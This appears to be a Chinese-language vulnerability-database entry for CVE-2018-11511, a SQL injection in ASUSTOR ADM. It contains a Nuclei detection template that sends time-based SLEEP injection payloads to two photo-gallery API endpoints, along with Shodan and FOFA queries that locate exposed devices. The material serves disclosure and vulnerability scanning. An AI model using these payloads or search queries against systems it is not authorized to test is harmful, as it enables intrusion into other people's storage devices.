CVE-2018-11511: ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection

日期: 2025-08-01 | 影响软件: ASUSTOR ADM | POC: 已公开

漏洞描述

ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further compromise of the affected system.

PoC代码[已公开]

id: CVE-2018-11511

info:
  name: ASUSTOR ADM 3.1.0.RFQ3 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    ASUSTOR ADM version 3.1.0.RFQ3 is vulnerable to SQL injection via the album_id parameter in the /photo-gallery/api/album/tree_lists/ endpoint. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the database, potentially leading to information disclosure or further compromise of the affected system.
  reference:
    - https://www.exploit-db.com/exploits/44909
    - https://nvd.nist.gov/vuln/detail/CVE-2018-11511
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-11511
    epss-score: 0.14771
    epss-percentile: 0.94221
    cwe-id: CWE-89
    cpe: cpe:2.3:a:asustor:asustor_data_master:3.1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: asustor
    product: asustor-data-master
    shodan-query: http.html:"ASUSTOR"
    fofa-query: body="ASUSTOR" && icon_hash="1678170702"
  tags: cve,cve2018,asustor,adm,sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 30s
        POST /photo-gallery/api/album/tree_lists/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        album_id=106298411+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api=v2

      - |
        @timeout: 30s
        POST /photo-gallery/api/photo/search/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        keyword=jpg&scope=106298414+AND+SLEEP(9)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=9'
          - 'status_code == 200'
          - 'contains(body, "success\":")'
          - 'contains_any(body, "album_not_exist\"", "album_items\":")'
        condition: and
# digest: 4b0a00483046022100e33671874a0b7e00a2695f950e7c9b88a5f6e86c9084201c502920bb216bc84a022100d3afbd9b75a849e6f2d7a45ae71e9d703ddd93f3f11180aef78b615f859c7adf:922c64590222798bb761d5b6d8e72950

相关漏洞推荐